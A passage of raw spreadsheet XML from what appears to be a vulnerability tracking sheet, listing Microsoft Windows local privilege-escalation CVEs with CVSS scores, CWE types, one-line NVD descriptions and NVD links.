t="inlineStr"><is><t>NVD</t></is></c><c r="O817" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P817" s="5" t="inlineStr" /><c r="Q817" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R817" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S817" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68885</t></is></c></row><row r="818"><c r="A818" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B818" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C818" s="5" t="inlineStr"><is><t>CVE-2026-68888</t></is></c><c r="D818" s="5" t="n"><v>7.8</v></c><c r="E818" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F818" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G818" s="5" t="inlineStr" /><c r="H818" s="5" t="n"><v>0.003</v></c><c r="I818" s="5" t="inlineStr" /><c r="J818" s="5" t="inlineStr" /><c r="K818" s="5" t="inlineStr" /><c r="L818" s="5" t="inlineStr" /><c r="M818" s="5" t="inlineStr" /><c r="N818" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O818" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P818" s="5" t="inlineStr" /><c r="Q818" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R818" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S818" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68888</t></is></c></row><row r="819"><c r="A819" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B819" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C819" s="5" t="inlineStr"><is><t>CVE-2026-68890</t></is></c><c r="D819" s="5" t="n"><v>7.8</v></c><c r="E819" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F819" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G819" s="5" t="inlineStr" /><c r="H819" s="5" t="n"><v>0.002</v></c><c r="I819" s="5" t="inlineStr" /><c r="J819" s="5" t="inlineStr" /><c r="K819" s="5" t="inlineStr" /><c r="L819" s="5" t="inlineStr" /><c r="M819" s="5" t="inlineStr" /><c r="N819" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O819" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P819" s="5" t="inlineStr" /><c r="Q819" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R819" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S819" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68890</t></is></c></row><row r="820"><c r="A820" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B820" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C820" s="5" t="inlineStr"><is><t>CVE-2026-68892</t></is></c><c r="D820" s="5" t="n"><v>7.8</v></c><c r="E820" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F820" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G820" s="5" t="inlineStr" /><c r="H820" s="5" t="n"><v>0.002</v></c><c r="I820" s="5" t="inlineStr" /><c r="J820" s="5" t="inlineStr" /><c r="K820" s="5" t="inlineStr" /><c r="L820" s="5" t="inlineStr" /><c r="M820" s="5" t="inlineStr" /><c r="N820" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O820" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P820" s="5" t="inlineStr" /><c r="Q820" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R820" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S820" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68892</t></is></c></row><row r="821"><c r="A821" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B821" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C821" s="5" t="inlineStr"><is><t>CVE-2026-68896</t></is></c><c r="D821" s="5" t="n"><v>7.8</v></c><c r="E821" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F821" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G821" s="5" t="inlineStr" /><c r="H821" s="5" t="n"><v>0.004</v></c><c r="I821" s="5" t="inlineStr" /><c r="J821" s="5" t="inlineStr" /><c r="K821" s="5" t="inlineStr" /><c r="L821" s="5" t="inlineStr" /><c r="M821" s="5" t="inlineStr" /><c r="N821" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O821" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P821" s="5" t="inlineStr" /><c r="Q821" s="5" t="inlineStr"><is><t>CWE-36</t></is></c><c r="R821" s="5" t="inlineStr"><is><t>Absolute path traversal in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S821" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68896</t></is></c></row><row r="822"><c r="A822" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B822" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C822" s="5" t="inlineStr"><is><t>CVE-2026-69265</t></is></c><c r="D822" s="5" t="n"><v>7.8</v></c><c r="E822" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F822" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G822" s="5" t="inlineStr" /><c r="H822" s="5" t="n"><v>0.002</v></c><c r="I822" s="5" t="inlineStr" /><c r="J822" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K82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22" s="5" t="inlineStr" /><c r="M822" s="5" t="inlineStr" /><c r="N822" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O822" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P822" s="5" t="inlineStr" /><c r="Q822" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R822" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S822" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69265</t></is></c></row><row r="823"><c r="A823" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B823" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C823" s="5" t="inlineStr"><is><t>CVE-2026-69269</t></is></c><c r="D823" s="5" t="n"><v>7.8</v></c><c r="E823" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F823" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G823" s="5" t="inlineStr" /><c r="H823" s="5" t="n"><v>0.003</v></c><c r="I823" s="5" t="inlineStr" /><c r="J823" s="5" t="inlineStr" /><c r="K823" s="5" t="inlineStr" /><c r="L823" s="5" t="inlineStr" /><c r="M823" s="5" t="inlineStr" /><c r="N823" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O823" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P823" s="5" t="inlineStr" /><c r="Q823" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="R823" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S823" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69269</t></is></c></row><row r="824"><c r="A824" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B824" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C824" s="5" t="inlineStr"><is><t>CVE-2026-69270</t></is></c><c r="D824" s="5" t="n"><v>7.8</v></c><c r="E824" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F824" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G824" s="5" t="inlineStr" /><c r="H824" s="5" t="n"><v>0.002</v></c><c r="I824" s="5" t="inlineStr" /><c r="J824" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K82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24" s="5" t="inlineStr" /><c r="M824" s="5" t="inlineStr" /><c r="N824" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O824" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P824" s="5" t="inlineStr" /><c r="Q824" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="R824" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S824" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69270</t></is></c></row><row r="825"><c r="A825" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B825" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C825" s="5" t="inlineStr"><is><t>CVE-2026-69277</t></is></c><c r="D825" s="5" t="n"><v>7.8</v></c><c r="E825" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F825" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G825" s="5" t="inlineStr" /><c r="H825" s="5" t="n"><v>0.003</v></c><c r="I825" s="5" t="inlineStr" /><c r="J825" s="5" t="inlineStr" /><c r="K825" s="5" t="inlineStr" /><c r="L825" s="5" t="inlineStr" /><c r="M825" s="5" t="inlineStr" /><c r="N825" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O825" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P825" s="5" t="inlineStr" /><c r="Q825" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R825" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S825" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69277</t></is></c></row><row r="826"><c r="A826" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B826" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C826" s="5" t="inlineStr"><is><t>CVE-2026-69283</t></is></c><c r="D826" s="5" t="n"><v>7.8</v></c><c r="E826" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F826" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G826" s="5" t="inlineStr" /><c r="H826" s="5" t="n"><v>0.002</v></c><c r="I826" s="5" t="inlineStr" /><c r="J826" s="5" t="inlineStr" /><c r="K826" s="5" t="inlineStr" /><c r="L826" s="5" t="inlineStr" /><c r="M826" s="5" t="inlineStr" /><c r="N826" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O826" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P826" s="5" t="inlineStr" /><c r="Q826" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R826" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows CD-ROM Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S826" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69283</t></is></c></row><row r="827"><c r="A827" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B827" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C827" s="5" t="inlineStr"><is><t>CVE-2026-69284</t></is></c><c r="D827" s="5" t="n"><v>7.8</v></c><c r="E827" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F827" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G827" s="5" t="inlineStr" /><c r="H827" s="5" t="n"><v>0.002</v></c><c r="I827" s="5" t="inlineStr" /><c r="J827" s="5" t="inlineStr" /><c r="K827" s="5" t="inlineStr" /><c r="L827" s="5" t="inlineStr" /><c r="M827" s="5" t="inlineStr" /><c r="N827" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O827" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P827" s="5" t="inlineStr" /><c r="Q827" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R827" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DCOM Server allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S827" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69284</t></is></c></row><row r="828"><c r="A828" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B828" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C828" s="5" t="inlineStr"><is><t>CVE-2026-69289</t></is></c><c r="D828" s="5" t="n"><v>7.8</v></c><c r="E828" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F828" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G828" s="5" t="inlineStr" /><c r="H828" s="5" t="n"><v>0.004</v></c><c r="I828" s="5" t="inlineStr" /><c r="J828" s="5" t="inlineStr" /><c r="K828" s="5" t="inlineStr" /><c r="L828" s="5" t="inlineStr" /><c r="M828" s="5" t="inlineStr" /><c r="N828" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O828" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P828" s="5" t="inlineStr" /><c r="Q828" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="R828" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Setup Files Cleanup allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S828" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69289</t></is></c></row><row r="829"><c r="A829" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B829" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C829" s="5" t="inlineStr"><is><t>CVE-2026-69290</t></is></c><c r="D829" s="5" t="n"><v>7.8</v></c><c r="E829" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F829" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G829" s="5" t="inlineStr" /><c r="H829" s="5" t="n"><v>0.002</v></c><c r="I829" s="5" t="inlineStr" /><c r="J829" s="5" t="inlineStr" /><c r="K829" s="5" t="inlineStr" /><c r="L829" s="5" t="inlineStr" /><c r="M829" s="5" t="inlineStr" /><c r="N829" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O829" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P829" s="5" t="inlineStr" /><c r="Q829" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R829" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S829" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69290</t></is></c></row><row r="830"><c r="A830" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B830" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C830" s="5" t="inlineStr"><is><t>CVE-2026-69293</t></is></c><c r="D830" s="5" t="n"><v>7.8</v></c><c r="E830" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F830" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G830" s="5" t="inlineStr" /><c r="H830" s="5" t="n"><v>0.002</v></c><c r="I830" s="5" t="inlineStr" /><c r="J830" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K83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30" s="5" t="inlineStr" /><c r="M830" s="5" t="inlineStr" /><c r="N830" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O830" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P830" s="5" t="inlineStr" /><c r="Q830" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="R830" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S830" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69293</t></is></c></row><row r="831"><c r="A831" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B831" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C831" s="5" t="inlineStr"><is><t>CVE-2026-69295</t></is></c><c r="D831" s="5" t="n"><v>7.8</v></c><c r="E831" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F831" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G831" s="5" t="inlineStr" /><c r="H831" s="5" t="n"><v>0.003</v></c><c r="I831" s="5" t="inlineStr" /><c r="J831" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K83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1" s="5" t="inlineStr" /><c r="M831" s="5" t="inlineStr" /><c r="N831" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O831" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P831" s="5" t="inlineStr" /><c r="Q831" s="5" t="inlineStr"><is><t>CWE-125, CWE-20</t></is></c><c r="R831" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S831" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69295</t></is></c></row><row r="832"><c r="A832" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B832" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C832" s="5" t="inlineStr"><is><t>CVE-2026-69298</t></is></c><c r="D832" s="5" t="n"><v>7.8</v></c><c r="E832" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F832" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G832" s="5" t="inlineStr" /><c r="H832" s="5" t="n"><v>0.003</v></c><c r="I832" s="5" t="inlineStr" /><c r="J832" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K8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32" s="5" t="inlineStr" /><c r="M832" s="5" t="inlineStr" /><c r="N832" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O832" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P832" s="5" t="inlineStr" /><c r="Q832" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R832" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S832" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69298</t></is></c></row><row r="833"><c r="A833" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B833" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C833" s="5" t="inlineStr"><is><t>CVE-2026-69307</t></is></c><c r="D833" s="5" t="n"><v>7.8</v></c><c r="E833" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F833" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G833" s="5" t="inlineStr" /><c r="H833" s="5" t="n"><v>0.003</v></c><c r="I833" s="5" t="inlineStr" /><c r="J833" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K83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3" s="5" t="inlineStr" /><c r="M833" s="5" t="inlineStr" /><c r="N833" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O833" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P833" s="5" t="inlineStr" /><c r="Q833" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R833" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S833" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69307</t></is></c></row><row r="834"><c r="A834" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B834" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C834" s="5" t="inlineStr"><is><t>CVE-2026-69312</t></is></c><c r="D834" s="5" t="n"><v>7.8</v></c><c r="E834" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F834" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G834" s="5" t="inlineStr" /><c r="H834" s="5" t="n"><v>0.003</v></c><c r="I834" s="5" t="inlineStr" /><c r="J834" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K83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34" s="5" t="inlineStr" /><c r="M834" s="5" t="inlineStr" /><c r="N834" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O834" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P834" s="5" t="inlineStr" /><c r="Q834" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R834" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S834" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69312</t></is></c></row><row r="835"><c r="A835" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B835" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C835" s="5" t="inlineStr"><is><t>CVE-2026-69323</t></is></c><c r="D835" s="5" t="n"><v>7.8</v></c><c r="E835" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F835" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G835" s="5" t="inlineStr" /><c r="H835" s="5" t="n"><v>0.003</v></c><c r="I835" s="5" t="inlineStr" /><c r="J835" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K83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35" s="5" t="inlineStr" /><c r="M835" s="5" t="inlineStr" /><c r="N835" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O835" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P835" s="5" t="inlineStr" /><c r="Q835" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R835" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S835" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69323</t></is></c></row><row r="836"><c r="A836" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B836" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C836" s="5" t="inlineStr"><is><t>CVE-2026-69324</t></is></c><c r="D836" s="5" t="n"><v>7.8</v></c><c r="E836" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F836" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G836" s="5" t="inlineStr" /><c r="H836" s="5" t="n"><v>0.003</v></c><c r="I836" s="5" t="inlineStr" /><c r="J836" s="5" t="inlineStr" /><c r="K836" s="5" t="inlineStr" /><c r="L836" s="5" t="inlineStr" /><c r="M836" s="5" t="inlineStr" /><c r="N836" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O836" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P836" s="5" t="inlineStr" /><c r="Q836" s="5" t="inlineStr"><is><t>CWE-125, CWE-843</t></is></c><c r="R836" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows Performance Monitor allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S836" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69324</t></is></c></row><row r="837"><c r="A837" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B837" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C837" s="5" t="inlineStr"><is><t>CVE-2026-69328</t></is></c><c r="D837" s="5" t="n"><v>7.8</v></c><c r="E837" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F837" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G837" s="5" t="inlineStr" /><c r="H837" s="5" t="n"><v>0.003</v></c><c r="I837" s="5" t="inlineStr" /><c r="J837" s="5" t="inlineStr" /><c r="K837" s="5" t="inlineStr" /><c r="L837" s="5" t="inlineStr" /><c r="M837" s="5" t="inlineStr" /><c r="N837" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O837" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P837" s="5" t="inlineStr" /><c r="Q837" s="5" t="inlineStr"><is><t>CWE-426</t></is></c><c r="R837" s="5" t="inlineStr"><is><t>Untrusted search path in Windows Storage allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S837" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69328</t></is></c></row><row r="838"><c r="A838" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B838" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C838" s="5" t="inlineStr"><is><t>CVE-2026-69348</t></is></c><c r="D838" s="5" t="n"><v>7.8</v></c><c r="E838" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F838" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G838" s="5" t="inlineStr" /><c r="H838" s="5" t="n"><v>0.003</v></c><c r="I838" s="5" t="inlineStr" /><c r="J838" s="5" t="inlineStr" /><c r="K838" s="5" t="inlineStr" /><c r="L838" s="5" t="inlineStr" /><c r="M838" s="5" t="inlineStr" /><c r="N838" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O838" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P838" s="5" t="inlineStr" /><c r="Q838" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R838" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S838" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69348</t></is></c></row><row r="839"><c r="A839" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B839" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C839" s="5" t="inlineStr"><is><t>CVE-2026-69352</t></is></c><c r="D839" s="5" t="n"><v>7.8</v></c><c r="E839" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F839" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G839" s="5" t="inlineStr" /><c r="H839" s="5" t="n"><v>0.003</v></c><c r="I839" s="5" t="inlineStr" /><c r="J839" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K83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39" s="5" t="inlineStr" /><c r="M839" s="5" t="inlineStr" /><c r="N839" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O839" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P839" s="5" t="inlineStr" /><c r="Q839" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="R839" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S839" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69352</t></is></c></row><row r="840"><c r="A840" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B840" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C840" s="5" t="inlineStr"><is><t>CVE-2026-69359</t></is></c><c r="D840" s="5" t="n"><v>7.8</v></c><c r="E840" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F840" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G840" s="5" t="inlineStr" /><c r="H840" s="5" t="n"><v>0.003</v></c><c r="I840" s="5" t="inlineStr" /><c r="J840" s="5" t="inlineStr" /><c r="K840" s="5" t="inlineStr" /><c r="L840" s="5" t="inlineStr" /><c r="M840" s="5" t="inlineStr" /><c r="N840" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O840" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P840" s="5" t="inlineStr" /><c r="Q840" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R840" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Active Directory Domain Services allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S840" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69359</t></is></c></row><row r="841"><c r="A841" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B841" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C841" s="5" t="inlineStr"><is><t>CVE-2026-69368</t></is></c><c r="D841" s="5" t="n"><v>7.8</v></c><c r="E841" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F841" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G841" s="5" t="inlineStr" /><c r="H841" s="5" t="n"><v>0.002</v></c><c r="I841" s="5" t="inlineStr" /><c r="J841" s="5" t="inlineStr" /><c r="K841" s="5" t="inlineStr" /><c r="L841" s="5" t="inlineStr" /><c r="M841" s="5" t="inlineStr" /><c r="N841" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O841" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P841" s="5" t="inlineStr" /><c r="Q841" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R841" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S841" s="6" 